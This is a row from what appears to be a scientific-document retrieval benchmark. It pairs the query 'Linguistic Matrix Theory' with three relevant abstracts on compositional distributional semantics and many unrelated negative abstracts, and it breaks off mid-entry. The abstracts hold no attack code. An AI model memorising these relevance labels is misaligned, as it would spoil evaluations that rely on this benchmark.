query_id (stringlengths 32–32) | query (stringlengths 5–5.38k) | positive_passages (listlengths 1–23) | negative_passages (listlengths 4–100) | subset (stringclasses, 7 values)
---|---|---|---|---|
0690d3ee6da187505b7265b06869e858 | Linguistic Matrix Theory | [
{
"docid": "0f2bca5d7ff30c82150611a75d41e029",
"text": "This short paper summarizes a faithful implementation of the categorical framework of Coecke et al. (2010), the aim of which is to provide compositionality in distributional models of lexical semantics. Based on Frobenius Algebras, our method enable us to (1) have a unifying meaning space for phrases and sentences of different structure and word vectors, (2) stay faithful to the linguistic types suggested by the underlying type-logic, and (3) perform the concrete computations in lower dimensions by reducing the space complexity. We experiment with two different parameters of the model and apply the setting to a verb disambiguation and a term/definition classification task with promising results.",
"title": ""
},
{
"docid": "c256a2ba1e7a81a6be271f7b14fe311b",
"text": "We present a model for compositional distributional semantics related to the framework of Coecke et al. (2010), and emulating formal semantics by representing functions as tensors and arguments as vectors. We introduce a new learning method for tensors, generalising the approach of Baroni and Zamparelli (2010). We evaluate it on two benchmark data sets, and find it to outperform existing leading methods. We argue in our analysis that the nature of this learning method also renders it suitable for solving more subtle problems compositional distributional models might face.",
"title": ""
},
{
"docid": "434400e864e30a25b87cdd0e4490f33c",
"text": "We propose a mathematical framework for a unification of the distributional theory of meaning in terms of vector space models, and a compositional theory for grammatical types, for which we rely on the algebra of Pregroups, introduced by Lambek. This mathematical framework enables us to compute the meaning of a well-typed sentence from the meanings of its constituents. Concretely, the type reductions of Pregroups are ‘lifted’ to morphisms in a category, a procedure that transforms meanings of constituents into a meaning of the (well-typed) whole. Importantly, meanings of whole sentences live in a single space, independent of the grammatical structure of the sentence. Hence the inner-product can be used to compare meanings of arbitrary sentences, as it is for comparing the meanings of words in the distributional model. The mathematical structure we employ admits a purely diagrammatic calculus which exposes how the information flows between the words in a sentence in order to make up the meaning of the whole sentence. A variation of our ‘categorical model’ which involves constraining the scalars of the vector spaces to the semiring of Booleans results in a Montague-style Boolean-valued semantics.",
"title": ""
}
] | [
{
"docid": "f0926d59f842d8f32f072b9325dddd84",
"text": "Smart home IoT devices have been more prevalent than ever before but the relevant security considerations fail to keep up with due to device and technology heterogeneity and resource constraints, making IoT systems susceptible to various attacks. In this paper, we propose a novel graph-based mechanism to identify the vulnerabilities in communication of IoT devices for smart home systems. Our approach takes one or more packet capture files as inputs to construct a traffic graph by passing the captured messages, identify the correlated subgraphs by examining the attribute-value pairs associated with each message, and then quantify their vulnerabilities based on the sensitivity levels of different keywords. To test the effectiveness of our approach, we setup a smart home system that can control a smart bulb LB100 via either the smartphone APP for LB100 or the Google Home speaker. We collected and analyzed 58,714 messages and exploited 6 vulnerable correlated sub graphs, based on which we implemented 6 attack cases that can be easily reproduced by attackers with little knowledge of IoT. This study is novel as our approach takes only the collected traffic files as inputs without requiring the knowledge of the device firmware while being able to identify new vulnerabilities. With this approach, we won the third prize out of 20 teams in a hacking competition.",
"title": ""
},
{
"docid": "f2730c0a11e5c3d436c777e51f2142b4",
"text": "The proliferation and ubiquity of temporal data across many disciplines has generated substantial interest in the analysis and mining of time series. Clustering is one of the most popular data-mining methods, not only due to its exploratory power but also because it is often a preprocessing step or subroutine for other techniques. In this article, we present k-Shape and k-MultiShapes (k-MS), two novel algorithms for time-series clustering. k-Shape and k-MS rely on a scalable iterative refinement procedure. As their distance measure, k-Shape and k-MS use shape-based distance (SBD), a normalized version of the cross-correlation measure, to consider the shapes of time series while comparing them. Based on the properties of SBD, we develop two new methods, namely ShapeExtraction (SE) and MultiShapesExtraction (MSE), to compute cluster centroids that are used in every iteration to update the assignment of time series to clusters. k-Shape relies on SE to compute a single centroid per cluster based on all time series in each cluster. In contrast, k-MS relies on MSE to compute multiple centroids per cluster to account for the proximity and spatial distribution of time series in each cluster. To demonstrate the robustness of SBD, k-Shape, and k-MS, we perform an extensive experimental evaluation on 85 datasets against state-of-the-art distance measures and clustering methods for time series using rigorous statistical analysis. SBD, our efficient and parameter-free distance measure, achieves similar accuracy to Dynamic Time Warping (DTW), a highly accurate but computationally expensive distance measure that requires parameter tuning. For clustering, we compare k-Shape and k-MS against scalable and non-scalable partitional, hierarchical, spectral, density-based, and shapelet-based methods, with combinations of the most competitive distance measures. k-Shape outperforms all scalable methods in terms of accuracy. Furthermore, k-Shape also outperforms all non-scalable approaches, with one exception, namely k-medoids with DTW, which achieves similar accuracy. However, unlike k-Shape, this approach requires tuning of its distance measure and is significantly slower than k-Shape. k-MS performs similarly to k-Shape in comparison to rival methods, but k-MS is significantly more accurate than k-Shape. Beyond clustering, we demonstrate the effectiveness of k-Shape to reduce the search space of one-nearest-neighbor classifiers for time series. Overall, SBD, k-Shape, and k-MS emerge as domain-independent, highly accurate, and efficient methods for time-series comparison and clustering with broad applications.",
"title": ""
},
{
"docid": "d03fa0dcb14dc19ef5eca5a564b70238",
"text": "Many requirements documents are written in natural language (NL). However, with the flexibility of NL comes the risk of introducing unwanted ambiguities in the requirements and misunderstandings between stakeholders. In this paper, we describe an automated approach to identify potentially nocuous ambiguity, which occurs when text is interpreted differently by different readers. We concentrate on anaphoric ambiguity, which occurs when readers may disagree on how pronouns should be interpreted. We describe a number of heuristics, each of which captures information that may lead a reader to favor a particular interpretation of the text. We use these heuristics to build a classifier, which in turn predicts the degree to which particular interpretations are preferred. We collected multiple human judgements on the interpretation of requirements exhibiting anaphoric ambiguity and showed how the distribution of these judgements can be used to assess whether a particular instance of ambiguity is nocuous. Given a requirements document written in natural language, our approach can identify sentences that contain anaphoric ambiguity, and use the classifier to alert the requirements writer of text that runs the risk of misinterpretation. We report on a series of experiments that we conducted to evaluate the performance of the automated system we developed to support our approach. The results show that the system achieves high recall with a consistent improvement on baseline precision subject to some ambiguity tolerance levels, allowing us to explore and highlight realistic and potentially problematic ambiguities in actual requirements documents.",
"title": ""
},
{
"docid": "094b1b2ceb20cf9c97ab42a9399a6dd8",
"text": "This paper proposes an agricultural environment monitoring server system for monitoring information concerning an outdoors agricultural production environment utilizing Wireless Sensor Network (WSN) technology. The proposed agricultural environment monitoring server system collects environmental and soil information on the outdoors through WSN-based environmental and soil sensors, collects image information through CCTVs, and collects location information using GPS modules. This collected information is converted into a database through the agricultural environment monitoring server consisting of a sensor manager, which manages information collected from the WSN sensors, an image information manager, which manages image information collected from CCTVs, and a GPS manager, which processes location information of the agricultural environment monitoring server system, and provides it to producers. In addition, a solar cell-based power supply is implemented for the server system so that it could be used in agricultural environments with insufficient power infrastructure. This agricultural environment monitoring server system could even monitor the environmental information on the outdoors remotely, and it could be expected that the use of such a system could contribute to increasing crop yields and improving quality in the agricultural field by supporting the decision making of crop producers through analysis of the collected information.",
"title": ""
},
{
"docid": "6a86c166d32a7ecaec05cb8e6318ae5b",
"text": "Nowadays artificial neural networks are widely used to accurately classify and recognize patterns. An interesting application area is the Internet of Things (IoT), where physical things are connected to the Internet, and generate a huge amount of sensor data that can be used for a myriad of new, pervasive applications. Neural networks' ability to comprehend unstructured data make them a useful building block for such IoT applications. As neural networks require a lot of processing power, especially during the training phase, these are most often deployed in a cloud environment, or on specialized servers with dedicated GPU hardware. However, for IoT applications, sending all raw data to a remote back-end might not be feasible, taking into account the high and variable latency to the cloud, or could lead to issues concerning privacy. In this paper the DIANNE middleware framework is presented that is optimized for single sample feed-forward execution and facilitates distributing artificial neural networks across multiple IoT devices. The modular approach enables executing neural network components on a large number of heterogeneous devices, allowing us to exploit the local compute power at hand, and mitigating the need for a large server-side infrastructure at runtime.",
"title": ""
},
{
"docid": "a3afecbe3dad37294175a96f78b070d6",
"text": "Achieving an appropriate balance between training and competition stresses and recovery is important in maximising the performance of athletes. A wide range of recovery modalities are now used as integral parts of the training programmes of elite athletes to help attain this balance. This review examined the evidence available as to the efficacy of these recovery modalities in enhancing between-training session recovery in elite athletes. Recovery modalities have largely been investigated with regard to their ability to enhance the rate of blood lactate removal following high-intensity exercise or to reduce the severity and duration of exercise-induced muscle injury and delayed onset muscle soreness (DOMS). Neither of these reflects the circumstances of between-training session recovery in elite athletes. After high-intensity exercise, rest alone will return blood lactate to baseline levels well within the normal time period between the training sessions of athletes. The majority of studies examining exercise-induced muscle injury and DOMS have used untrained subjects undertaking large amounts of unfamiliar eccentric exercise. This model is unlikely to closely reflect the circumstances of elite athletes. Even without considering the above limitations, there is no substantial scientific evidence to support the use of the recovery modalities reviewed to enhance the between-training session recovery of elite athletes. Modalities reviewed were massage, active recovery, cryotherapy, contrast temperature water immersion therapy, hyperbaric oxygen therapy, nonsteroidal anti-inflammatory drugs, compression garments, stretching, electromyostimulation and combination modalities. Experimental models designed to reflect the circumstances of elite athletes are needed to further investigate the efficacy of various recovery modalities for elite athletes. Other potentially important factors associated with recovery, such as the rate of post-exercise glycogen synthesis and the role of inflammation in the recovery and adaptation process, also need to be considered in this future assessment.",
"title": ""
},
{
"docid": "63b08fb1b6c01b4a78b02dc57eaff7a4",
"text": "Multi-person articulated pose tracking in unconstrained videos is an important while challenging problem. In this paper, going along the road of top-down approaches, we propose a decent and efficient pose tracker based on pose flows. First, we design an online optimization framework to build the association of cross-frame poses and form pose flows (PF-Builder). Second, a novel pose flow non-maximum suppression (PFNMS) is designed to robustly reduce redundant pose flows and re-link temporal disjoint ones. Extensive experiments show that our method significantly outperforms best reported results on two standard Pose Tracking datasets ( [13] and [8]) by 13 mAP 25 MOTA and 6 mAP 3 MOTA respectively. Moreover, in the case of working on detected poses in individual frames, the extra computation of pose tracker is very minor, guaranteeing online 10FPS tracking. Our source codes are made publicly available at https://github.com/YuliangXiu/PoseFlow.",
"title": ""
},
{
"docid": "626c274978a575cd06831370a6590722",
"text": "The honeypot has emerged as an effective tool to provide insights into new attacks and exploitation trends. However, a single honeypot or multiple independently operated honeypots only provide limited local views of network attacks. Coordinated deployment of honeypots in different network domains not only provides broader views, but also create opportunities of early network anomaly detection, attack correlation, and global network status inference. Unfortunately, coordinated honeypot operation require close collaboration and uniform security expertise across participating network domains. The conflict between distributed presence and uniform management poses a major challenge in honeypot deployment and operation. To address this challenge, we present Collapsar, a virtual machine-based architecture for network attack capture and detention. A Collapsar center hosts and manages a large number of high-interaction virtual honeypots in a local dedicated network. To attackers, these honeypots appear as real systems in their respective production networks. Decentralized logical presence of honeypots provides a wide diverse view of network attacks, while the centralized operation enables dedicated administration and convenient event correlation, eliminating the need for honeypot expertise in every production network domain. Collapsar realizes the traditional honeyfarm vision as well as our new reverse honeyfarm vision, where honeypots act as vulnerable clients exploited by real-world malicious servers. We present the design, implementation, and evaluation of a Collapsar prototype. Our experiments with a number of real-world attacks demonstrate the effectiveness and practicality of Collapsar. © 2006 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "9876e4298f674a617f065f348417982a",
"text": "On the basis of medical officers diagnosis, thirty three (N = 33) hypertensives, aged 35-65 years, from Govt. General Hospital, Pondicherry, were examined with four variables viz, systolic and diastolic blood pressure, pulse rate and body weight. The subjects were randomly assigned into three groups. The exp. group-I underwent selected yoga practices, exp. group-II received medical treatment by the physician of the said hospital and the control group did not participate in any of the treatment stimuli. Yoga imparted in the morning and in the evening with 1 hr/session. day-1 for a total period of 11-weeks. Medical treatment comprised drug intake every day for the whole experimental period. The result of pre-post test with ANCOVA revealed that both the treatment stimuli (i.e., yoga and drug) were effective in controlling the variables of hypertension.",
"title": ""
},
{
"docid": "05d91e98965f9c246d9485d5046c0556",
"text": "This paper addresses the problem of learning tòdivide and conquer' by meaningful hierarchical adaptive decomposition of temporal sequences. This problem is relevant for time-series analysis as well as for goal-directed learning, particularily if event sequences tend to have hierarchical temporal structure. The rst neural systems for recursively chunking sequences are described. These systems are based on a principle called thèprinciple of history compression'. This principle essentially says: As long as a predictor is able to predict future environmental inputs from previous ones, no additional knowledge can be obtained by observing these inputs in reality. Only unexpected inputs deserve attention. A focus is on a class of 2-network systems which try to collapse a self-organizing (possibly multi-level) hierarchy of temporal predictors into a single recurrent network. Only those input events that were not expected by the rst recurrent net are transferred to the second recurrent net. Therefore the second net receives a reduced discription of the input history. It tries to develop internal representations for`higher-level' temporal structure. These internal representations in turn serve to create additional training signals for the rst net, thus helping the rst net to create longer and longer`chunks' for the second net. Experiments show that chunking systems can be superior to the conventional training algorithms for recurrent nets. 1 OUTLINE Section 2 motivates the search for sequence-composing systems by describing major drawbacks of`conventional' learning algorithms for recurrent networks with time-varying inputs and outputs. Section 3 describes a simple observation which is essential for the rest of this paper: It describes thèprinciple of history compression'. This principle essentially says: As long as a predictor is able to predict future environmental inputs from previous ones, no additional knowledge can be obtained by observing these inputs in reality. Only unexpected inputs deserve attention. This principle is of particular interest if typical event sequences have hierarchical temporal structure. Basic schemes for constructing sequence chunking systems based on the principle of history compression are described. Section 4 then describes on-line and o-line versions of a particular 2-network chunking system which tries to collapse a self-organizing (possibly multi-level) predictor hierarchy into a single recurrent network (the automatizer). The idea is to feed everything that is unexpected into a `higher-level' recurrent net (the chunker). Since the expected things can be derived from the unexpected things by the automatizer, the chunker is fed with a reduced description of the input history. The chunker has a …",
"title": ""
},
{
"docid": "7588252227f9faef2212962e606cc992",
"text": "OBJECTIVE\nThis study examines the reasons for not using any method of contraception as well as reasons for not using modern methods of contraception, and factors associated with the future intention to use different types of contraceptives in India and its selected states, namely Uttar Pradesh, Assam and West Bengal.\n\n\nMETHODS\nData from the third wave of District Level Household and Facility Survey, 2007-08 were used. Bivariate as well as logistic regression analyses were performed to fulfill the study objective.\n\n\nRESULTS\nPostpartum amenorrhea and breastfeeding practices were reported as the foremost causes for not using any method of contraception. Opposition to use, health concerns and fear of side effects were reported to be major hurdles in the way of using modern methods of contraception. Results from logistic regression suggest considerable variation in explaining the factors associated with future intention to use contraceptives.\n\n\nCONCLUSION\nPromotion of health education addressing the advantages of contraceptive methods and eliminating apprehension about the use of these methods through effective communication by community level workers is the need of the hour.",
"title": ""
},
{
"docid": "5906d20bea1c95399395d045f84f11c9",
"text": "Constructive interference (CI) enables concurrent transmissions to interfere non-destructively, so as to enhance network concurrency. In this paper, we propose deliberate synchronized constructive interference (Disco), which ensures concurrent transmissions of an identical packet to synchronize more precisely than traditional CI. Disco envisions concurrent transmissions to positively interfere at the receiver, and potentially allows orders of magnitude reductions in energy consumption and improvements in link quality. We also theoretically introduce a sufficient condition to construct Disco with IEEE 802.15.4 radio for the first time. Moreover, we propose Triggercast, a distributed middleware service, and show it is feasible to generate Disco on real sensor network platforms like TMote Sky. To synchronize transmissions of multiple senders at the chip level, Triggercast effectively compensates propagation and radio processing delays, and has 95th percentile synchronization errors of at most 250 ns. Triggercast also intelligently decides which co-senders to participate in simultaneous transmissions, and aligns their transmission time to maximize the overall link Packet Reception Ratio (PRR), under the condition of maximal system robustness. Extensive experiments in real testbeds demonstrate that Triggercast significantly improves PRR from 5 to 70 percent with seven concurrent senders. We also demonstrate that Triggercast provides 1.3χ PRR performance gains in average, when it is integrated with existing data forwarding protocols.",
"title": ""
},
{
"docid": "c03bf622dde1bd81c0eb83a87e1f9924",
"text": "Image-schemas (e.g. CONTAINER, PATH, FORCE) are pervasive skeletal patterns of a preconceptual nature which arise from everyday bodily and social experiences and which enable us to mentally structure perceptions and events (Johnson 1987; Lakoff 1987, 1989). Within Cognitive Linguistics, these recurrent non-propositional models are taken to unify the different sensory and motor experiences in which they manifest themselves in a direct way and, most significantly, they may be metaphorically projected from the realm of the physical to other more abstract domains. In this paper, we intend to provide a cognitively plausible account of the OBJECT image-schema, which has received rather contradictory treatments in the literature. The OBJECT schema is experientially grounded in our everyday interaction with our own bodies and with other discrete entities. In the light of existence-related language (more specifically, linguistic expressions concerning the creation and destruction of both physical and abstract entities), it is argued that the OBJECT image-schema may be characterized as a basic image-schema, i.e. one that functions as a guideline for the activation of additional models, including other dependent image-schematic patterns (LINK, PART-WHOLE, CENTREPERIPHERY, etc.) which highlight various facets of the higher-level schema.",
"title": ""
},
{
"docid": "f4bf4be69ea3f3afceca056e2b5b8102",
"text": "In this paper we present a conversational dialogue system, Ch2R (Chinese Chatter Robot) for online shopping guide, which allows users to inquire about information of mobile phone in Chinese. The purpose of this paper is to describe our development effort in terms of the underlying human language technologies (HLTs) as well as other system issues. We focus on a mixed-initiative conversation mechanism for interactive shopping guide combining initiative guiding and question understanding. We also present some evaluation on the system in mobile phone shopping guide domain. Evaluation results demonstrate the efficiency of our approach.",
"title": ""
},
{
"docid": "36ea5beaaa58f781eaff21a372dbf6cf",
"text": "With the increasing scale of deployment of Internet of Things (IoT), concerns about IoT security have become more urgent. In particular, memory corruption attacks play a predominant role as they allow remote compromise of IoT devices. Control-flow integrity (CFI) is a promising and generic defense technique against these attacks. However, given the nature of IoT deployments, existing protection mechanisms for traditional computing environments (including CFI) need to be adapted to the IoT setting. In this paper, we describe the challenges of enabling CFI on microcontroller (MCU) based IoT devices. We then present CaRE, the first interrupt-aware CFI scheme for low-end MCUs. CaRE uses a novel way of protecting the CFI metadata by leveraging TrustZone-M security extensions introduced in the ARMv8-M architecture. Its binary instrumentation approach preserves the memory layout of the target MCU software, allowing pre-built bare-metal binary code to be protected by CaRE. We describe our implementation on a Cortex-M Prototyping System and demonstrate that CaRE is secure while imposing acceptable performance and memory impact.",
"title": ""
},
{
"docid": "ddb804eec29ebb8d7f0c80223184305a",
"text": "Near Field Communication (NFC) enables physically proximate devices to communicate over very short ranges in a peer-to-peer manner without incurring complex network configuration overheads. However, adoption of NFC-enabled applications has been stymied by the low levels of penetration of NFC hardware. In this paper, we address the challenge of enabling NFC-like capability on the existing base of mobile phones. To this end, we develop Dhwani, a novel, acoustics-based NFC system that uses the microphone and speakers on mobile phones, thus eliminating the need for any specialized NFC hardware. A key feature of Dhwani is the JamSecure technique, which uses self-jamming coupled with self-interference cancellation at the receiver, to provide an information-theoretically secure communication channel between the devices. Our current implementation of Dhwani achieves data rates of up to 2.4 Kbps, which is sufficient for most existing NFC applications.",
"title": ""
},
{
"docid": "155de33977b33d2f785fd86af0aa334f",
"text": "Model-based analysis tools, built on assumptions and simplifications, are difficult to handle smart grids with data characterized by volume, velocity, variety, and veracity (i.e., 4Vs data). This paper, using random matrix theory (RMT), motivates data-driven tools to perceive the complex grids in high-dimension; meanwhile, an architecture with detailed procedures is proposed. In algorithm perspective, the architecture performs a high-dimensional analysis and compares the findings with RMT predictions to conduct anomaly detections. Mean spectral radius (MSR), as a statistical indicator, is defined to reflect the correlations of system data in different dimensions. In management mode perspective, a group-work mode is discussed for smart grids operation. This mode breaks through regional limitations for energy flows and data flows, and makes advanced big data analyses possible. For a specific large-scale zone-dividing system with multiple connected utilities, each site, operating under the group-work mode, is able to work out the regional MSR only with its own measured/simulated data. The large-scale interconnected system, in this way, is naturally decoupled from statistical parameters perspective, rather than from engineering models perspective. Furthermore, a comparative analysis of these distributed MSRs, even with imperceptible different raw data, will produce a contour line to detect the event and locate the source. It demonstrates that the architecture is compatible with the block calculation only using the regional small database; beyond that, this architecture, as a data-driven solution, is sensitive to system situation awareness, and practical for real large-scale interconnected systems. Five case studies and their visualizations validate the designed architecture in various fields of power systems. To our best knowledge, this paper is the first attempt to apply big data technology into smart grids.",
"title": ""
},
{
"docid": "64fbd2207a383bc4b04c66e8ee867922",
"text": "Ultra compact, short pulse, high voltage, high current pulsers are needed for a variety of non-linear electrical and optical applications. With a fast risetime and short pulse width, these drivers are capable of producing sub-nanosecond electrical and thus optical pulses by gain switching semiconductor laser diodes. Gain-switching of laser diodes requires a sub-nanosecond pulser capable of driving a low output impedance (5 /spl Omega/ or less). Optical pulses obtained had risetimes as fast as 20 ps. The designed pulsers also could be used for triggering photo-conductive semiconductor switches (PCSS), gating high speed optical imaging systems, and providing electrical and optical sources for fast transient sensor applications. Building on concepts from Lawrence Livermore National Laboratory, the development of pulsers based on solid state avalanche transistors was adapted to drive low impedances. As each successive stage is avalanched in the circuit, the amount of overvoltage increases, increasing the switching speed and improving the turn on time of the output pulse at the final stage. The output of the pulser is coupled into the load using a Blumlein configuration.",
"title": ""
},
{
"docid": "1b8394f45b88f2474f72c500fc0a6fe4",
"text": "User-Generated live video streaming systems are services that allow anybody to broadcast a video stream over the Internet. These Over-The-Top services have recently gained popularity, in particular with e-sport, and can now be seen as competitors of the traditional cable TV. In this paper, we present a dataset for further works on these systems. This dataset contains data on the two main user-generated live streaming systems: Twitch and the live service of YouTube. We got three months of traces of these services from January to April 2014. Our dataset includes, at every five minutes, the identifier of the online broadcaster, the number of people watching the stream, and various other media information. In this paper, we introduce the dataset and we make a preliminary study to show the size of the dataset and its potentials. We first show that both systems generate a significant traffic with frequent peaks at more than 1 Tbps. Thanks to more than a million unique uploaders, Twitch is in particular able to offer a rich service at anytime. Our second main observation is that the popularity of these channels is more heterogeneous than what have been observed in other services gathering user-generated content.",
"title": ""
}
] | scidocsrr |
d6c5b61fee6f1ecdcdecd0efeffc2082 | Abnormality detection using deep neural networks with robust quasi-norm autoencoding and semi-supervised learning | [
{
"docid": "743424b3b532b16f018e92b2563458d5",
"text": "We consider the problem of finding a few representatives for a dataset, i.e., a subset of data points that efficiently describes the entire dataset. We assume that each data point can be expressed as a linear combination of the representatives and formulate the problem of finding the representatives as a sparse multiple measurement vector problem. In our formulation, both the dictionary and the measurements are given by the data matrix, and the unknown sparse codes select the representatives via convex optimization. In general, we do not assume that the data are low-rank or distributed around cluster centers. When the data do come from a collection of low-rank models, we show that our method automatically selects a few representatives from each low-rank model. We also analyze the geometry of the representatives and discuss their relationship to the vertices of the convex hull of the data. We show that our framework can be extended to detect and reject outliers in datasets, and to efficiently deal with new observations and large datasets. The proposed framework and theoretical foundations are illustrated with examples in video summarization and image classification using representatives.",
"title": ""
},
{
"docid": "15ef258e08dcc0fe0298c089fbf5ae1c",
"text": "In this paper we report the set-up and results of the Multimodal Brain Tumor Image Segmentation Benchmark (BRATS) organized in conjunction with the MICCAI 2012 and 2013 conferences. Twenty state-of-the-art tumor segmentation algorithms were applied to a set of 65 multi-contrast MR scans of low- and high-grade glioma patients - manually annotated by up to four raters - and to 65 comparable scans generated using tumor image simulation software. Quantitative evaluations revealed considerable disagreement between the human raters in segmenting various tumor sub-regions (Dice scores in the range 74%-85%), illustrating the difficulty of this task. We found that different algorithms worked best for different sub-regions (reaching performance comparable to human inter-rater variability), but that no single algorithm ranked in the top for all sub-regions simultaneously. Fusing several good algorithms using a hierarchical majority vote yielded segmentations that consistently ranked above all individual algorithms, indicating remaining opportunities for further methodological improvements. The BRATS image data and manual annotations continue to be publicly available through an online evaluation system as an ongoing benchmarking resource.",
"title": ""
}
] | [
{
"docid": "fb83d0d3ea08cc1e21a1a22ba810dca0",
"text": "conditions. The effect of the milk run logistics on the reduction of CO2 is also discussed. The promotion of Milk-Run logistics can be highly evaluated from the viewpoint of environmental policy.",
"title": ""
},
{
"docid": "523852d2c5465f514c2f47d273b84667",
"text": "For the State Farm Photo Classification Kaggle Challenge, we use two different Convolutional Neural Network models to classify pictures of drivers in their cars. The first is a model trained from scratch on the provided dataset, and the other is a model that was first pretrained on the ImageNet dataset and then underwent transfer learning on the provided StateFarm dataset. With the first approach, we achieved a validation accuracy of 10.9%, which is not much better than random. However, with the second approach, we achieved an accuracy of 21.1%. Finally, we explore ways to make these models better based on past models and training techniques.",
"title": ""
},
{
"docid": "19350a76398e0054be44c73618cdfb33",
"text": "An emerging class of data-intensive applications involve the geographically dispersed extraction of complex scientific information from very large collections of measured or computed data. Such applications arise, for example, in experimental physics, where the data in question is generated by accelerators, and in simulation science, where the data is generated by supercomputers. So-called Data Grids provide essential infrastructure for such applications, much as the Internet provides essential services for applications such as e-mail and the Web. We describe here two services that we believe are fundamental to any Data Grid: reliable, high-speed transport and replica management. Our high-speed transport service, GridFTP, extends the popular FTP protocol with new features required for Data Grid applications, such as striping and partial file access. Our replica management service integrates a replica catalog with GridFTP transfers to provide for the creation, registration, location, and management of dataset replicas. We present the design of both services and also preliminary performance results. Our implementations exploit security and other services provided by the Globus Toolkit.",
"title": ""
},
{
"docid": "b85330c2d0816abe6f28fd300e5f9b75",
"text": "This paper presents a novel dual polarized planar aperture antenna using the low-temperature cofired ceramics technology to realize a novel antenna-in-package for a 60-GHz CMOS differential transceiver chip. Planar aperture antenna technology ensures high gain and wide bandwidth. Differential feeding is adopted to be compatible with the chip. Dual polarization makes the antenna function as a pair of single polarized antennas but occupies much less area. The antenna is ±45° dual polarized, and each polarization acts as either a transmitting (TX) or receiving (RX) antenna. This improves the signal-to-noise ratio of the wireless channel in a point-to-point communication, because the TX/RX polarization of one antenna is naturally copolarized with the RX/TX polarization of the other antenna. A prototype of the proposed antenna is designed, fabricated, and measured, whose size is 12 mm × 12 mm × 1.128 mm (2.4λ0 × 2.4λ0 × 0.226λ0). The measurement shows that the -10 dB impedance bandwidth covers the entire 60 GHz unlicensed band (57-64 GHz) for both polarizations. Within the bandwidth, the isolation between the ports of the two polarizations is better than 26 dB, and the gain is higher than 10 dBi with a peak of around 12 dBi for both polarizations.",
"title": ""
},
{
"docid": "505c4be0a257d5b935496f66b20a7765",
"text": "Video summarization has unprecedented importance to help us digest, browse, and search today's ever-growing video collections. We propose a novel subset selection technique that leverages supervision in the form of humancreated summaries to perform automatic keyframe-based video summarization. The main idea is to nonparametrically transfer summary structures from annotated videos to unseen test videos. We show how to extend our method to exploit semantic side information about the video's category/ genre to guide the transfer process by those training videos semantically consistent with the test input. We also show how to generalize our method to subshot-based summarization, which not only reduces computational costs but also provides more flexible ways of defining visual similarity across subshots spanning several frames. We conduct extensive evaluation on several benchmarks and demonstrate promising results, outperforming existing methods in several settings.",
"title": ""
},
{
"docid": "59ddabc255d07fe6b8fb13082c8dd62d",
"text": "Mambo is a full-system simulator for modeling PowerPC-based systems. It provides building blocks for creating simulators that range from purely functional to timing-accurate. Functional versions support fast emulation of individual PowerPC instructions and the devices necessary for executing operating systems. Timing-accurate versions add the ability to account for device timing delays, and support the modeling of the PowerPC processor microarchitecture. We describe our experience in implementing the simulator and its uses within IBM to model future systems, support early software development, and design new system software.",
"title": ""
},
{
"docid": "11e9bdfbdcc7718878c4a87c894964eb",
"text": "Detecting topics from Twitter streams has become an important task as it is used in various fields including natural disaster warning, users opinion assessment, and traffic prediction. In this article, we outline different types of topic detection techniques and evaluate their performance. We categorize the topic detection techniques into five categories which are clustering, frequent pattern mining, Exemplar-based, matrix factorization, and probabilistic models. For clustering techniques, we discuss and evaluate nine different techniques which are sequential k-means, spherical k-means, Kernel k-means, scalable Kernel k-means, incremental batch k-means, DBSCAN, spectral clustering, document pivot clustering, and Bngram. Moreover, for matrix factorization techniques, we analyze five different techniques which are sequential Latent Semantic Indexing (LSI), stochastic LSI, Alternating Least Squares (ALS), Rank-one Downdate (R1D), and Column Subset Selection (CSS). Additionally, we evaluate several other techniques in the frequent pattern mining, Exemplar-based, and probabilistic model categories. Results on three Twitter datasets show that Soft Frequent Pattern Mining (SFM) and Bngram achieve the best term precision, while CSS achieves the best term recall and topic recall in most of the cases. Moreover, Exemplar-based topic detection obtains a good balance between the term recall and term precision, while achieving a good topic recall and running time.",
"title": ""
},
{
"docid": "c0610eab7d3825d6b12959fedd9656ea",
"text": "We introduce a new deep convolutional neural network, CrescendoNet, by stacking simple building blocks without residual connections. Each Crescendo block contains independent convolution paths with increased depths. The numbers of convolution layers and parameters are only increased linearly in Crescendo blocks. In experiments, CrescendoNet with only 15 layers outperforms almost all networks without residual connections on benchmark datasets, CIFAR10, CIFAR100, and SVHN. Given sufficient amount of data as in SVHN dataset, CrescendoNet with 15 layers and 4.1M parameters can match the performance of DenseNet-BC with 250 layers and 15.3M parameters. CrescendoNet provides a new way to construct high performance deep convolutional neural networks with simple network architecture. Moreover, by investigating a various combination of subnetworks in CrescendoNet, we note that the high performance of CrescendoNet may come from its implicit ensemble behavior, which gives CrescendoNet an anytime classification property. Furthermore, the independence between paths in CrescendoNet allows us to introduce a new path-wise training procedure, which can reduce the memory needed for training.",
"title": ""
},
{
"docid": "c697ce69b5ba77cce6dce93adaba7ee0",
"text": "Online social networks play a major role in modern societies, and they have shaped the way social relationships evolve. Link prediction in social networks has many potential applications such as recommending new items to users, friendship suggestion and discovering spurious connections. Many real social networks evolve the connections in multiple layers (e.g. multiple social networking platforms). In this article, we study the link prediction problem in multiplex networks. As an example, we consider a multiplex network of Twitter (as a microblogging service) and Foursquare (as a location-based social network). We consider social networks of the same users in these two platforms and develop a meta-path-based algorithm for predicting the links. The connectivity information of the two layers is used to predict the links in Foursquare network. Three classical classifiers (naive Bayes, support vector machines (SVM) and K-nearest neighbour) are used for the classification task. Although the networks are not highly correlated in the layers, our experiments show that including the cross-layer information significantly improves the prediction performance. The SVM classifier results in the best performance with an average accuracy of 89%.",
"title": ""
},
{
"docid": "0169f6c2eee1710d2ccd1403116da68f",
"text": "A resonant snubber is described for voltage-source inverters, current-source inverters, and self-commutated frequency changers. The main self-turn-off devices have shunt capacitors directly across them. The lossless resonant snubber described avoids trapping energy in a converter circuit where high dynamic stresses at both turn-on and turn-off are normally encountered. This is achieved by providing a temporary parallel path through a small ordinary thyristor (or other device operating in a similar node) to take over the high-stress turn-on duty from the main gate turn-off (GTO) or power transistor, in a manner that leaves no energy trapped after switching.<<ETX>>",
"title": ""
},
{
"docid": "e6dabfc7165883e77c4cf6772ed59ee4",
